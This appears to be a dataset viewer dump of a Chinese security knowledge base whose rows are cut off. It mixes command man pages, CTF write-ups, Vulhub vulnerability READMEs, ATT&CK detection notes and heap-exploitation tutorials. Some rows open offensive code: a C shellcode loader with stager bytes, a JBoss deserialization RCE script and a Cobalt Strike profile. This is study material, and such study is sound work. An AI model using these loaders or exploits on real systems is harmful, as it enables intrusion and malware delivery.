text
stringlengths
100
9.93M
category
stringclasses
11 values
vgremove === 用于用户删除LVM卷组 ## 补充说明 **vgremove命令** 用于用户删除LVM卷组。当要删除的卷组上已经创建了逻辑卷时,vgremove命令需要进行确认删除,防止误删除数据。 ### 语法 ```shell vgremove(选项)(参数) ``` ### 选项 ```shell -f:强制删除。 ``` ### 参数 卷组:指定要删除的卷组名称。 ### 实例 使用vgremove命令删除LVM卷组"vg1000"。在命令行中输入下面的命令: ```shell [root@localhost ~]# vgremove vg1000 #删除卷组"vg1000" Volume grou...
sec-knowleage
# 67. 把字符串转换成整数 ## 题目链接 [NowCoder](https://www.nowcoder.com/practice/1277c681251b4372bdef344468e4f26e?tpId=13&tqId=11202&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 将一个字符串转换成一个整数,字符串不是一个合法的数值则返回 0,要求不能使用字符串转换整数的库函数。 ```html Iuput: +2147483647 1a33 Output: 21...
sec-knowleage
# Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 参考链接: - https://www.exploit-db.com/exploits/43458/ - https://paper.seebug.org/487/ - https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-2...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "CLOSE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME CLOSE \- 关闭一个游标 .SH SYNOPSIS .sp .nf CLOSE \fIname\fR .sp .fi .SH "DESCRIPTION 描述" .PP \fBCLOSE\fR 释放和一个游标关联的资源。 一个游标关闭后,不允许对其再做任何操作。一个不再使用的游标应该关闭掉。 .PP 在一个事务用 COMMIT 或者 ROLLBACK 终止之...
sec-knowleage
# YApi NoSQL注入导致远程命令执行漏洞 YApi是一个API管理工具。在其1.12.0版本之前,存在一处NoSQL注入漏洞,通过该漏洞攻击者可以窃取项目Token,并利用这个Token执行任意Mock脚本,获取服务器权限。 参考链接: - <https://github.com/YMFE/yapi/commit/59bade3a8a43e7db077d38a4b0c7c584f30ddf8c> ## 漏洞环境 执行如下命令启动一个YApi v1.10.2服务: ``` docker compose up -d ``` 环境启动后,访问`http://your-ip:3000`即可看到YApi首页。 ## 漏...
sec-knowleage
> 本节中会介绍几种搭建域渗透环境的方法 # 搭建域环境 ## 针对新手的小型环境 第一个实验指导书可以帮你建立一个非常小而且简单的实验环境,这个实验环境由域控制器和几个工作组组成。目的就是使用`Responder`和其他骚气的工具练习凭据中转。 ## 针对老司机的中大型环境 我添加了一篇文章,使用ESXi构建一个更大的实验环境,并使用`Vagrant`自动化。如果你有兴趣,并且有很多时间,可以try try。它需要设置`Active Directory`和配置`Windows`计算机。它可以用作`MCSA和MCSE认证`的配套实验环境。 ## 自动构建域渗透环境 有一段时间,我一直使用Hyper-V 去玩 [AutomatedLa...
sec-knowleage
'\" t .TH "SHUTDOWN" "8" "" "systemd 231" "shutdown" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.debia...
sec-knowleage
# Polkit's `pkexec` Local Privilege Escalation Vulnerability (CVE-2021-4034) [中文版本(Chinese version)](README.zh-cn.md) Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. The pkexec application is a setuid tool that provided by Polkit, it is designed to all...
sec-knowleage
# 测试支持 下面的代码用于支持测试,默认情况下 perturb_byte 是0。 ```c static int perturb_byte; static void alloc_perturb(char *p, size_t n) { if (__glibc_unlikely(perturb_byte)) memset(p, perturb_byte ^ 0xff, n); } static void free_perturb(char *p, size_t n) { if (__glibc_unlikely(perturb_byte)) memset(p, perturb_byte, n); } ```
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "DROP TABLE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME DROP TABLE \- 删除一个表 .SH SYNOPSIS .sp .nf DROP TABLE \fIname\fR [, ...] [ CASCADE | RESTRICT ] .sp .fi .SH "DESCRIPTION 描述" .PP \fBDROP TABLE\fR 从数据库中删除表或视图。 只有其所有者才能删除一个表或视图。要清空一...
sec-knowleage
import binascii s=open("flag.pcapng","rb").read().split(".2015.") res="" for i in s: j=i.split("Host: ")[-1] try: r=binascii.unhexlify(j) print r res=res+r except: pass print res
sec-knowleage
# JWT 在Spring Boot中,可以使用许多库来实现JWT验证和生成。然而,如果在实现JWT验证和生成的过程中存在漏洞,可能会导致JWT token被伪造。以下是可能导致JWT token伪造漏洞的一些常见问题: 1. 使用弱密钥:如果使用弱密钥生成JWT token,攻击者可能会使用暴力破解或其他技术来破解密钥,从而伪造JWT token。 2. 未正确验证JWT token:在处理JWT token时,应该对其进行验证以确保其有效性。如果未正确验证JWT token,则攻击者可能会伪造JWT token并使用它来访问受保护的资源。 3. 错误地解析JWT token:在处理JWT token时,应该正确解析JWT tok...
sec-knowleage
--- title: Alan AI date: 2023-03-03 6:00:00 background: bg-[#4aa181] tags: - AI - AlanAI - Prompts - Tips categories: - Toolkit intro: This cheat covers all major script concepts, client API methods, handlers and other tools to create a multimodal conversational experience with Alan AI --- Dialog sc...
sec-knowleage
# Diffie-Hellman 2 (crypto 300) ###ENG [PL](#pl-version) In the task we get parameters for Diffie-Hellman key exchange. However, we get only the public secrets from the participants, like if we were sniffing them, and we want to get the shared secret from this. We get: ``` p = 670390396497129854978701249910292306373968...
sec-knowleage
### IDEA概述 **国际数据加密算法**(International Data Encryption Algorithm,IDEA),最早称为**改良建议加密标准**(Improved Proposed Encryption Standard,IPES),是密码学上一种对称密钥分组密码,由 James Massey 与来学嘉设计,在1991年首次提出。这个算法的提出,是为了取代旧有的数据加密标准 DES。(来自维基百科) ### IDEA密钥生成 IDEA 在加密的每轮中使用 6个密钥,然后最后输出轮使用4个密钥。所以一共有52个。 1. 前8个密钥来自与该算法最初的密钥,K1 取自密钥的高16比特,K8 取自密钥的低16比特...
sec-knowleage
# -*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2017-09-08 05:07 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='User',...
sec-knowleage
# T1190-CVE-2020-25790-Typesetter CMS文件上传漏洞 ## 来自ATT&CK的描述 使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。 如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。 对于网站和...
sec-knowleage
# 基于 ARP 发现内网存活主机 ### ARP简介: ARP,通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址 ### 1、nmap扫描 ```bash root@John:~# nmap -sn -PR 192.168.1.1/24 ``` ![](media/5dfd9a546cd24575a6f3dcc700e27fdb.jpg) ### 2、msf扫描 ```bash msf > use auxiliary/scanner/disc...
sec-knowleage
# T1595-002-主动扫描_漏洞扫描 ## 来自ATT&CK的描述 攻击者可能会在实施攻击前扫描漏洞来确定攻击目标。漏洞扫描通常会检查目标主机/应用程序(例如:软件和版本)的配置是否有攻击者试图利用的漏洞。 这些扫描还可能包括收集目标组织的主机信息等其它尝试,从而识别更常见的可利用漏洞。漏洞扫描通常是通过服务器banner、监听端口或其他网络组件(Tomcat\Weblogic等)来获取运行软件和版本号。 ## 测试案例 常见扫描器(Nucei\Awvs\Xray) ## 检测日志 HTTP流量 ## 测试复现 暂无实测示例 ## 测试留痕 暂无实测,故无留痕 ## 检测规则/思路 ### 常见扫描器特征 #### Awvs(...
sec-knowleage
# T1583-002-盗取账户-电子邮箱账户 ## 来自ATT&CK的描述 攻击者可能会创建可在攻击目标过程中使用的电子邮件账户。攻击者可以使用在电子邮件供应商处创建的账户来推进他们的行动,例如利用它们来进行 "信息钓鱼 "或 "网络钓鱼"。攻击者还可以采取措施,围绕电子邮件账户培养一个角色,例如通过使用社交媒体账户,增加后续行为的成功机会。创建的电子邮件账户也可用于获取基础设施(例如:域名)。 为了减少将行动与自己联系起来的机会,攻击者可能会使用一次性的电子邮件服务。 ## 测试案例 通过搜索引擎可以检索到很多临时邮箱、历史联系号码等资源。 ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思...
sec-knowleage
showmount === 显示NFS服务器加载的信息 ## 补充说明 **showmount命令** 查询“mountd”守护进程,以显示NFS服务器加载的信息。 ### 语法 ```shell showmount(选项)(参数) ``` ### 选项 ```shell -d:仅显示已被NFS客户端加载的目录; -e:显示NFS服务器上所有的共享目录。 ``` ### 参数 NFS服务器:指定NFS服务器的ip地址或者主机名。
sec-knowleage
## 信息收集模块 |Information Gathering|||||| |:-:|:-:|:-:|:-:|:-:|:-:| |[acccheck](acccheck.md)|[ace-voip](ace-voip.md)|[Amap](Amap.md)|[Automater](Automater.md)|[bing-ip2hosts](bing-ip2hosts.md)|[braa](braa.md)| |[CaseFile](CaseFile.md)|[CDPSnarf](CDPSnarf.md)|[cisco-torch](cisco-torch.md)|[Cookie Cadger](Cookie%20Cadger.md...
sec-knowleage
# Docker Manager * Category: Misc. * 350 Points * Solved by the JCTF Team ## Description > At Last! > > We got the SSH credentials, Can you hack it and send us the password? > > URL: ssh://bsidestlv:d0ck3rm4n4g3r@docker-manager.ctf.bsidestlv.com:8000 ## Solution We connect to SSH server using `sshpass -p 'd0ck3rm4n4g...
sec-knowleage
### stack pivoting原理 stack pivoting,正如它所描述的,该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后再在相应的位置进行 ROP。一般来说,我们可能在以下情况需要使用 stack pivoting - 可以控制的栈溢出的字节数较少,难以构造较长的 ROP 链 - 开启了 PIE 保护,栈地址未知,我们可以将栈劫持到已知的区域。 - 其它漏洞难以利用,我们需要进行转换,比如说将栈劫持到堆空间,从而在堆上写 rop 及进行堆漏洞利用 此外,利用 stack pivoting 有以下几个要求 - 可以控制程序执行流。 - 可以控制 sp 指针。一般来说,控制栈指针会使用 ROP,常见的控制栈指针的 g...
sec-knowleage
# Image crackme (re/crypto, 61 solved, 100p) In the challenge we get a [binary](image_crackme.exe) a [sample input](MeePwn.jpg) and [output](MeePwn.ascii.bak). The binary performs some kind of encryption of given payload, using privided key. It was a RE challenge, but code looked horrible, so we decided to try blackbox...
sec-knowleage
# HTTP 报文 --- ## 基础 HTTP 请求报文由3部分组成(请求行+请求头+请求体): 下面是一个实际的请求报文 : - **①** 是请求方法,GET 和 POST 是最常见的 HTTP 方法,除此以外还包括 DELETE、HEAD、OPTIONS、PUT、TRACE。不过,当前的大多数浏览器只支持 GET 和 POST,Spring 3.0 提供了一个 `HiddenHttpMethodFilter` ,允许你通过“_method”的表单参数指定这些特殊的 HTTP 方法(实际上还是通过 POST 提交表单)。服务端配置了 HiddenHttpMethodFilter 后,Spring 会根据 _method 参数指...
sec-knowleage
# PCAP 文件修复 ## PCAP文件结构 一般来说,对于 `PCAP` 文件格式考察较少,且通常都能借助于现成的工具如 `pcapfix` 直接修复,这里大致介绍下几个常见的块,详细可以翻看[Here](http://www.tcpdump.org/pcap/pcap.html)。 - Tools - [PcapFix Online](https://f00l.de/hacking/pcapfix.php) - [PcapFix](https://github.com/Rup0rt/pcapfix/tree/devel) 一般文件结构 ```shell 0 1 ...
sec-knowleage
lftp === 优秀的文件客户端程序 ## 补充说明 **lftp命令** 是一款优秀的文件客户端程序,它支持ftp、SETP、HTTP和FTPs等多种文件传输协议。lftp支持tab自动补全,记不得命令双击tab键,就可以看到可能的选项了。 ### 语法 ```shell lftp(选项)(参数) ``` ### 选项 ```shell -f:指定lftp指令要执行的脚本文件; -c:执行指定的命令后退出; --help:显示帮助信息; --version:显示指令的版本号。 ``` ### 参数 站点:要访问的站点的ip地址或者域名。 ### 实例 **登录ftp** ```shell lftp 用户名:密码@ft...
sec-knowleage
lsblk === 列出块设备信息 ## 补充说明 **lsblk命令** 用于列出所有可用块设备的信息,而且还能显示他们之间的依赖关系,但是它不会列出RAM盘的信息。块设备有硬盘,闪存盘,cd-ROM等等。lsblk命令包含在util-linux-ng包中,现在该包改名为util-linux。这个包带了几个其它工具,如dmesg。要安装lsblk,请在此处下载util-linux包。Fedora用户可以通过命令`sudo yum install util-linux-ng`来安装该包。 ### 选项 ```shell -a, --all # 显示所有设备。 -b, --bytes # 以b...
sec-knowleage
# Real baby rsa (crypto, 40p, 505 solved) In the challenge we get [source code](problem.py) and [ciphertext](output). The code is pretty trivial: ```python flag = 'TWCTF{CENSORED}' # Public Parameters N = 3623997354155893221576815439802751054299929546059879399186304397431750340513225874358080410198619570583809987508695...
sec-knowleage
--- title: Metagoofil categories: Information Gathering tags: [information gathering,kali linux,recon,enumeration,reporting,metagoofil] date: 2017-04-24 13:01:00 --- 0x00 介绍 ------- Metagoofil是一种搜索提取目标公司公开文档(pdf,doc,xls,ppt,docx,pptx,xlsx)中元数据的信息收集工具。 Metagoofil将在Google中进行搜索,以将文档识别并下载到本地磁盘,然后将使用不同的库(如Hachoir,PdfMiner)提...
sec-knowleage
apropos === 在 whatis 数据库中查找字符串 ## 补充说明 **apropos命令** 在一些特定的包含系统命令的简短描述的数据库文件里查找关键字,然后把结果送到标准输出。 如果你不知道完成某个特定任务所需要命令的名称,可以使用一个关键字通过Linux apropos实用程序来搜索它。该实用程序可以搜索关键字并且显示所有包含匹配项的man页面的简短描述。另外,使用man实用程序和-k(关键字)选项,可以得到和用Linux apropos实用程序相同的结果(实际上是相同的命令)。 ### 语法 ```shell apropos [-dalhvV] -e|-[w|-r] [-s section] [-m system...
sec-knowleage
# FriendSpaceBookPlusAllAccessRedPremium.com Category: Reversing ## Description > Having snooped around like the expert spy you were never trained to be, you found something that takes your interest: "Cookie/www.FriendSpaceBookPlusAllAccessRedPremium.com" But unbeknownst to you, it was only the 700nm Wavelength herring...
sec-knowleage
# T1591-004-收集目标组织信息-确定角色 ## 来自ATT&CK的描述 攻击者可能会在目标组织中收集有关目标组织内的身份和角色的信息。有关业务角色的信息可能会揭示各种可针对性的细节,包括关键人员的可识别信息以及他们可以访问哪些数据/资源。 攻击者可以通过多种方式收集此信息,例如通过“网络钓鱼诱骗”直接诱捕。有关业务角色的信息也可以通过在线或其他可访问的数据集(例如,社交媒体或受害人拥有的网站)暴露给攻击者。 ## 测试案例 个人理解:攻击者可能会收集运维、网络管理员相关信息,后续可以进行精准社工,或者相关人员的账号密码爆破,也可能是发送目标组织成员感兴趣的邮件,实现邮件钓鱼等。 ## 检测日志 无 ## 测试复现 无 ##...
sec-knowleage
# 0x00 C加载shellcode c语言加载shellcode非常方便,C/C++好用是好用就是头有点凉快。以下加载方法均来自网络 第一种 ``` #include <windows.h> #include <stdio.h> #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" "\x52\x0c\x8b\x52\x14\x8b\x72\x28...
sec-knowleage
dpkg-query === Debian Linux中软件包的查询工具 ## 补充说明 **dpkg-query命令** 是Debian Linux中软件包的查询工具,它从dpkg软件包数据库中查询并辨识软件包的信息。 ### 语法 ```shell dpkg-query(选项)(参数) ``` ### 选项 ```shell -l:列出符合匹配模式的软件包; -s:查询软件包的状态信息; -L:显示软件包所安装的文件列表; -S:从安装的软件包中查询文件; -w:显示软件包信息; -c:显示软件包的控制文件路径; -p:显示软件包的细节。 ``` ### 参数 软件包名称:指定需要查询的软件包。 ### 实例 查找文件f...
sec-knowleage
# 0x00 profile语法分析 以 `backoff.profile` 为例来讲解 ``` # # Backoff POS Malware # # This profile takes steps to dress up the POST side of Beacon's C2 to # look like Backoff. The GET side is left generic. # # Indicators from: # http://blog.spiderlabs.com/2014/07/backoff-technical-analysis.html # https://gsr.trustwave.com/t...
sec-knowleage
# Python 3 from signal import alarm from Crypto.Util.number import * p = 160634950613302858781995506902938412625377360249559915379491492274326359260806831823821711441204122060415286351711411013883400510041411782176467940678464161205204391247137689678794367049197824119717278923753940984084059450704378828123780678883777...
sec-knowleage
journalctl === 检索 systemd 日志,是 CentOS 7 才有的工具。 ### 语法 ```shell journalctl [OPTIONS...] [MATCHES...] ``` ### 选项 ```shell Flags: --system # 显示系统日志 --user # 显示当前用户的用户日志 -M --machine=CONTAINER # 在本地容器上操作 -S --since=DATE # 显示不早于指定日期的条目 -U --until=DATE # 显示不晚于指定日期的条目 -c --curs...
sec-knowleage
<!-- ~ Licensed to the Apache Software Foundation (ASF) under one ~ or more contributor license agreements. See the NOTICE file ~ distributed with this work for additional information ~ regarding copyright ownership. The ASF licenses this file ~ to you under the Apache License, Version 2.0 (the ~ "License...
sec-knowleage
version: '3' services: rmi: build: "." ports: - 1099:1099 environment: - RMIIP=192.168.31.88
sec-knowleage
# Apache Solr Remote Code Execution Via Velocity Custom Template (CVE-2019-17558) [中文版本(Chinese version)](README.zh-cn.md) Solr is the popular, blazing-fast, open source enterprise search platform built on Apache Lucene(TM). Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the...
sec-knowleage
version: '2' services: nginx: image: nginx:1 volumes: - ./www:/usr/share/nginx/html - ./default.conf:/etc/nginx/conf.d/default.conf depends_on: - php ports: - "8080:80" php: image: php:7.2.10-fpm volumes: - ./www:/var/www/html
sec-knowleage
# 获取地址 在漏洞利用的过程中,我们常常需要获取一些变量,函数的地址,以便于能够进行进一步的利用。这里我将获取地址的方法分为如下几类 - 直接寻找地址,即我们可以通过反编译等手段直接看到对应符号的地址。 - 泄漏地址,即需要我们通过控制程序的执行流来泄漏程序中的某些符号指针的内容,来获取对应的地址。 - 推测地址,这里我们一般常用的就是根据某个段内的符号之间的偏移是固定的,从而来推断一些新的符号的地址。 - 猜测地址,一般主要指的是,我们需要自己去猜测对应符号的地址,这里伴随的往往就是暴力枚举了。 上述几种方法,是一种递进地考虑方式,我们在获取相关符号的地址时,应保持这样的思考方式。 在上面的几种方式中,我认为主要有两点核心思想 ...
sec-knowleage
.\" 中文版版权所有 Liu JingSong, www.linuxforum.net 2000 .\" 本文档可在遵照LDP GENERAL PUBLIC LICENSE,Version 1, September 1998 .\" 中描述的条件下进行复制,且该文件发布时必须包含该文档. .TH GZIP 1 local .SH NAME gzip, gunzip, zcat \- 压缩或展开文件 .SH 总揽 .ll +8 .B gzip .RB [ " \-acdfhlLnNrtvV19 " ] .RB [ \-S\ 后缀 ] [ .I "文件名 \&..." ] .ll -8 .br .B gunzip .RB [ " ...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "COMMIT" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME COMMIT \- 提交当前事务 .SH SYNOPSIS .sp .nf COMMIT [ WORK | TRANSACTION ] .sp .fi .SH "DESCRIPTION 描述" .PP \fBCOMMIT\fR 提交当前事务。 所有事务的更改都将为其他事务可见,而且保证当崩溃发生时的可持续性。 .SH "PARAMETERS 参数" .TP \f...
sec-knowleage
--- title: JavaScript date: 2020-12-24 17:12:25 background: bg-[#ebd94e] tags: - js - web categories: - Programming intro: | A JavaScript cheat sheet with the most important concepts, functions, methods, and more. A complete quick reference for beginners. plugins: - copyCode --- Getting Started ------...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "ALTER AGGREGATE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME ALTER AGGREGATE \- 修改一个聚集函数的定义 .SH SYNOPSIS .sp .nf ALTER AGGREGATE \fIname\fR ( \fItype\fR ) RENAME TO \fInewname\fR .sp .fi .SH "DESCRIPTION 描述" .PP \fBALTER AGGREGATE\fR ...
sec-knowleage
version: '2' services: web: image: vulhub/django:1.11.4 volumes: - .:/app ports: - "8000:8000" depends_on: - db environment: - DATABASE_URL=postgres://postgres:postgres@db:5432/postgres db: image: postgres:9.6-alpine environment: - POSTGRES_PASSWORD=postgres
sec-knowleage
# Large Bin Attack 分配跟 large bin 有关的 chunk,要经过 fastbin,unsorted bin,small bin 的分配,建议在学习 large bin attack 之前搞清楚 fastbin,unsorted bin 分配的流程。 ## large bin attack 这种攻击方式主要利用的是 chunk 进入 bin 中的操作,在 malloc 的时候,遍历 unsorted bin 时,对每一个 chunk,若无法 exact-fit 分配或不满足切割分配的条件,就会将该 chunk 置入相应的 bin 中,而此过程中缺乏对 largebin 的跳表指针的检测。 以 2.33 版本...
sec-knowleage
# Empire2 Web Exploitation, 450 points ## Description: > Well done, Agent 513! Our sources say Evil Empire Co is passing secrets around when you log in: https://2019shell1.picoctf.com/problem/13253/, can you help us find it? ## Solution: This is the follow-up for [Empire1](Empire1.md). The website interface is the sam...
sec-knowleage
# like1000 Forensics, 250 points ## Description: > This .tar file got tarred alot. ## Solution: Let's extract the file: ```console root@kali:/media/sf_CTFs/pico/like1000# mkdir out root@kali:/media/sf_CTFs/pico/like1000# cd out root@kali:/media/sf_CTFs/pico/like1000/out# cp ../1000.tar . root@kali:/media/sf_CTFs/pico/...
sec-knowleage
# Apache Flink `jobmanager/logs` Path Traversal (CVE-2020-17519) Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities. A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local fil...
sec-knowleage
# VulnOS 2 下载地址:https://download.vulnhub.com/vulnos/VulnOSv2.7z > 使用VirtualBox进行打开,调整USB为1.0才可以启动 > > ![image-20220608110526109](../../.gitbook/assets/image-20220608110526109.png) ## 实战操作 扫描到靶场IP:`192.168.32.4` ![image-20220608112207179](../../.gitbook/assets/image-20220608112207179.png) 扫描对外开放端口 ``` ┌──(root㉿kali)-[~]...
sec-knowleage
# assembly-2 Reversing, 250 points ## Description: > What does asm2(0x7,0x28) return? Submit the flag as a hexadecimal value (starting with '0x'). ```assembly .intel_syntax noprefix .bits 32 .global asm2 asm2: push ebp mov ebp,esp sub esp,0x10 mov eax,DWORD PTR [ebp+0xc] mov DWORD PTR [ebp-0x4],e...
sec-knowleage
nohup === 将程序以忽略挂起信号的方式运行起来 ## 补充说明 **nohup命令** 可以将程序以忽略挂起信号的方式运行起来,被运行的程序的输出信息将不会显示到终端。 无论是否将 nohup 命令的输出重定向到终端,输出都将附加到当前目录的 nohup.out 文件中。如果当前目录的 nohup.out 文件不可写,输出重定向到`$HOME/nohup.out`文件中。如果没有文件能创建或打开以用于追加,那么 command 参数指定的命令不可调用。如果标准错误是一个终端,那么把指定的命令写给标准错误的所有输出作为标准输出重定向到相同的文件描述符。 ### 语法 nohup(选项)(参数) ### 选项 ```sh...
sec-knowleage
#! /usr/bin/env python2 # Jboss Java Deserialization RCE (CVE-2015-7501) # Made with <3 by @byt3bl33d3r from __future__ import print_function import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import argparse impo...
sec-knowleage
# DSA 上面所描述的ElGamal签名算法在实际中并不常用,更常用的是其变体DSA。 ## 基本原理 ### 密钥生成 1. 选择一个合适的哈希函数,目前一般选择SHA1,当前也可以选择强度更高的哈希函数H。 2. 选择密钥的长度L和N,这两个值决定了签名的安全程度。在最初的DSS(**Digital Signature Standard** )中建议L必须为64的倍数,并且$512 \leq L \leq 1024$ ,当然,也可以更大。N必须大小必须不大于哈希函数H输出的长度。FIPS 186-3给出了一些建议的L和N的取值例子:(1024, 160), (2048, 224), (2048, 256),以及 (3,072,...
sec-knowleage
# T1007-系统服务发现 ## 来自ATT&CK的描述 攻击者可能会尝试获取有关注册服务的信息。可以使用操作系统程序获取有关服务的信息的命令是“sc”,或者使用Tasklist的“ tasklist /svc” 、或者使用Net命令的“net start” ,但是攻击者也可以使用其他工具。攻击者可以在自动发现过程中使用“ 系统服务发现”中的信息来决定后续行动该如何开展,包括攻击者是否完全感染目标或尝试执行特定操作。 ## 测试案例 windows下执行sc相关命令、tasklist /svc、net start ## 检测日志 windows 安全日志 ## 测试复现 ```dos C:\Windows\system32>sc ...
sec-knowleage
# Moodle Common Bugs ## Introduction What would you do if you came across a website that uses Moodle? ## How to Detect If you visit `https://target.com` and see the source code, you will see `<meta name="keywords" content="moodle,` 1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter ``` https://target.co...
sec-knowleage
# Satellite Category: Networking ## Description > Placing your ship in range of the Osmiums, you begin to receive signals. Hoping that you are not detected, because it's too late now, you figure that it may be worth finding out what these signals mean and what information might be "borrowed" from them. Can you hear me ...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH FACTOR 1 2022年9月 "GNU coreutils 9...
sec-knowleage
# Welcome to droid (Re, 635p, 24 solved) [PL](#pl-version) In the task we get [android application](droid.apk) to work with. Once we reverse the sources, it seems we need to pass some checks to reach the flag. However one of the checks is: ```java public String m4832k() { char[] cArr = new char[]{'a', 'b', 'c', 'd', '...
sec-knowleage
package com.b1ngz.sec.util; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; /** * Created by b1ngz on 2018/9/9. */ public class ResourceUtils { public static String readResourceFileAsStr(String filename) throws IOException { BufferedReader br = new BufferedR...
sec-knowleage
squidclient === squid服务器的客户端管理工具 ## 补充说明 **squidclient命令** 使用squid服务器的客户端管理工具,它可以查看squid服务器的详细运行信息和管理squid服务器。 ### 语法 ```shell squidclient(选项)(参数) ``` ### 选项 ```shell -a:不包含“accept:header”; -r:强制缓存重新加载URL; -s:安静模式,不输出信息到标准输出设备; -h:从指定主机获取url -l:指定一个本地ip地址进行绑定; -p:端口号,默认为3128; -m:指定发送请求的方法; -u:代理认证用户名。 ``` ### 参数 URL...
sec-knowleage
--- title: Markdown --- # Markdown 语法 ### 什么是Markdown语法? Markdown是一种可以使用普通文本编辑器编写的标记语言,通过简单的标记语法,它可以使普通文本内容具有一定的格式。Markdown是一种轻量级标记语言,目标是实现「易读易写」 ### 标题 在Markdown中,你只需要在文本前面加上# 即可,同理、你还可以增加二级标题、三级标题、四级标题、五级标题和六级标题,总共六级,只需要增加# 即可,标题字号相应降低。例如: ``` # 一级标题 ## 二级标题 ### 三级标题 #### 四级标题 ##### 五级标题 ###### 六级标题 ``` ### 锚点 Coding...
sec-knowleage
# 块加密 ## 概述 所谓块加密就是每次加密一块明文,常见的加密算法有 - IDEA 加密 - DES 加密 - AES 加密 块加密也是对称加密。 其实,我们也可以把块加密理解一种特殊的替代密码,但是其每次替代的是一大块。而正是由于一大块,明文空间巨大,而且对于不同的密钥,我们无法做一个表进行对应相应的密文,因此必须得有 **复杂** 的加解密算法来加解密明密文。 而与此同时,明文往往可能很长也可能很短,因此在块加密时往往需要两个辅助 - padding,即 padding 到指定分组长度 - 分组加密模式,即明文分组加密的方式。 ## 基本策略 在分组密码设计时,充分使用了 Shannon 提出的两大策略:混淆与扩散两大策略。...
sec-knowleage
当我们接到某个项目的时候,它已经是被入侵了。甚至已经被脱库,或残留后门等持续攻击洗库。 后渗透攻击者的本质是什么? 阻止防御者信息搜集,销毁行程记录,隐藏存留文件。 防御者的本质是什么? 寻找遗留信息,发现攻击轨迹与样本残留并且阻断再次攻击。 那么这里攻击者就要引入“持续攻击”,防御者就要引入“溯源取证与清理遗留”,攻击与持续攻击的分水岭是就是后渗透持续攻击,而表现形式其中之一就是后门。 ### 后门的种类: * 本地后门:如系统后门,这里指的是装机后自带的某功能或者自带软件后门 * 本地拓展后门:如iis 6的isapi,iis7的 模块后门 * 第三方后门:如apache,serv-u,第三方软件后门 * 第...
sec-knowleage
bzmore === 查看bzip2压缩过的文本文件的内容 ## 补充说明 **bzmore命令** 用于查看bzip2压缩过的文本文件的内容,当下一屏显示不下时可以实现分屏显示。 ### 语法 ```shell bzmore(参数) ``` ### 参数 文件:指定要分屏显示的.bz2压缩包。
sec-knowleage
# A7 ~ Gee cue elle (misc, 283p) > We installed a fancy automatic attack protection system to be more secure against automated attacks from robots and hackers so it can be fully A7 compliant! > Hint: .yaml~ > start.html In this task we are given a small HTML file. Its whole content is here: ```html <script> location.re...
sec-knowleage
apk === Alpine Linux 下的包管理工具 ## 使用实例 ```shell apk install xxx apk search xxx # 支持正则 apk info xxx # 查看包的详细信息 apk show # list local package # 卸载并删除 包 apk del openssh openntp vim ``` ### 升级 upgrade命令升级系统已安装的所以软件包(一般包括内核),当然也可指定仅升级部分软件包(通过-u或–upgrade选择指定)。 ```shell apk update # 更新最新本地镜像源 apk upgrade # 升级软件 apk add --upgrad...
sec-knowleage
# PCBC PCBC 的全称为明文密码块链接(Plaintext cipher-block chaining)。也称为填充密码块链接(Propagating cipher-block chaining)。 ## 加密 ## 解密 ## 特点 - 解密过程难以并行化 - 互换邻接的密文块不会对后面的密文块造成影响
sec-knowleage
